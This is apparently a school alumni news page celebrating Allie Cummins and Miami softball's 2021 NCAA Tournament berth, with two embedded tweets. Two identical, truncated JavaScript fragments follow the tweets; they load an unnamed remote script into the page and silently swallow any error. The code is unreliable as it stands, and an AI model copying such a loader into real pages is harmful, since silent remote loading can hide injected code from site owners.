Alumni
Alumni: Allie Cummins helps lead Miami to the NCAA Tournament since 2016!
Article found at cincinnati.com
Good Luck Allie! #WestPride
We will see you in Lexington on Friday! We take on Notre Dame at 2:30 p.m. in the first round of the @NCAAsoftball tournament!#RiseUpRedHawks #LoveAndHonor #GraduatingChampions pic.twitter.com/JDwAZopkFW
— Miami Softball (@MiamiOH_SB) May 17, 2021
The bracket! 🥎
🔗 https://t.co/m29SapfjX3
#RoadToWCWS pic.twitter.com/APl9krj4Yn— NCAA Softball (@NCAAsoftball) May 17, 2021
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();